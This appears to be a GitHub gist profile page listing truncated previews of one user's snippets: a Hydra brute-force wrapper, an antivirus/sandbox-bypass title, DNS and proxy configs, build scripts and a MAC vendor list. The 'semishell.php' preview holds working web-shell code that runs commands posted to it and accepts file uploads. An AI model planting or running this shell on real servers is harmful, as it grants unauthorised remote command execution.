Skip to content

Instantly share code, notes, and snippets.

View NullArray's full-sized avatar
:electron:
Contact me at developers@greysec.net

Vector Security NullArray

:electron:
Contact me at developers@greysec.net
View GitHub Profile
@NullArray
NullArray / hydra-wrapper.py
Created April 27, 2021 15:24
Quick wrapper for THC-Hydra could use somework.
#!/usr/bin/env python3
#____ ____ __
#\ \ / /____ _____/ |_ ___________
# \ Y // __ \_/ ___\ __\/ _ \_ __ \
# \ /\ ___/\ \___| | ( <_> ) | \/
# \___/ \___ >\___ >__| \____/|__|
# \/ \/
#----Authored by Vector/NullArray
##############################################
import os
@NullArray
NullArray / Memvalanche.c
Last active April 22, 2021 00:47
Simple AV/Sandbox bypass
/*
*____ ____ __
*\ \ / /____ _____/ |_ ___________
* \ Y // __ \_/ ___\ __\/ _ \_ __ \
* \ /\ ___/\ \___| | ( <_> ) | \/
* \___/ \___ >\___ >__| \____/|__|
* \/ \/
* ############################################## */
@NullArray
NullArray / pipper.py
Last active July 15, 2020 13:30
Install a `pip3 freze` backup package text file without interruption.
#!/usr/bin/env python3
#____ ____ __
#\ \ / /____ _____/ |_ ___________
# \ Y // __ \_/ ___\ __\/ _ \_ __ \
# \ /\ ___/\ \___| | ( <_> ) | \/
# \___/ \___ >\___ >__| \____/|__|
# \/ \/
#--Licensed under GNU GPL 3
#----Authored by Vector/NullArray
##############################################
@NullArray
NullArray / dnscrypt-proxy.toml
Last active July 7, 2020 21:38
Preconfigured DNSCrypt-Proxy config file. [Working Example]
##############################################
# #
# dnscrypt-proxy configuration #
# #
##############################################
listen_addresses = []
@NullArray
NullArray / HTTP-Proxy-Server.ps1
Created April 8, 2020 01:37
A little something to frustrate Micr$oft data mining operations.
#____ ____ __
#\ \ / /____ _____/ |_ ___________
# \ Y // __ \_/ ___\ __\/ _ \_ __ \
# \ /\ ___/\ \___| | ( <_> ) | \/
# \___/ \___ >\___ >__| \____/|__|
# \/ \/
#--Licensed under GNU GPL 3
#----Authored by Vector/NullArray
#
# Do't forget to run this as well.
#!/bin/sh
keylength=8
algo=$1
[[ "$algo" = "aes" ]] && keylength=16
[[ "$algo" = "3des" ]] && keylength=24
encfile=$(mktemp -t _encXXXXXX) && \
keyfile=$(mktemp -t _encXXXXXX) && \
dd if=/dev/urandom of="$keyfile" bs="$keylength" count=1 >/dev/null 2>&1 && \
@NullArray
NullArray / atom-build.sh
Created November 13, 2019 02:43
one of the setup shell scripts related deploying Atom
#!/bin/bash
if [ "$(uname)" == 'Darwin' ]; then
OS='Mac'
elif [ "$(expr substr $(uname -s) 1 5)" == 'Linux' ]; then
OS='Linux'
else
echo "Your platform ($(uname -a)) is not supported."
exit 1
fi
@NullArray
NullArray / semishell.php
Created July 18, 2019 02:46
Download to web server and navigate to the URL
<?php
/* phpbash by Alexander Reid (Arrexel) */
if (ISSET($_POST['cmd'])) {
$output = preg_split('/[\n]/', shell_exec($_POST['cmd']." 2>&1"));
foreach ($output as $line) {
echo htmlentities($line, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "<br>";
}
die();
} else if (!empty($_FILES['file']['tmp_name']) && !empty($_POST['path'])) {
$filename = $_FILES["file"]["name"];
@NullArray
NullArray / resolvers.txt
Created June 20, 2019 12:50
DNSCrypt-proxy Compatible Resolvers
aaflalo-me-gcp
aaflalo-me
adguard-dns-family
adguard-dns
adguard-dns-family-doh
adguard-dns-doh
adguard-dns-family-ipv6
adguard-dns-ipv6
ads-securedns-doh
ads-securedns-ipv6-doh
@NullArray
NullArray / MAC-by-Vendor.txt
Created June 3, 2019 23:08
List of valid MAC adresses sorted by vendor
Misc MACs:
Num MAC Vendor
--- --- ------
0000 - 00:00:00 - XEROX CORPORATION
0001 - 00:00:01 - XEROX CORPORATION
0002 - 00:00:02 - XEROX CORPORATION
0003 - 00:00:03 - XEROX CORPORATION
0004 - 00:00:04 - XEROX CORPORATION
0005 - 00:00:05 - XEROX CORPORATION
0006 - 00:00:06 - XEROX CORPORATION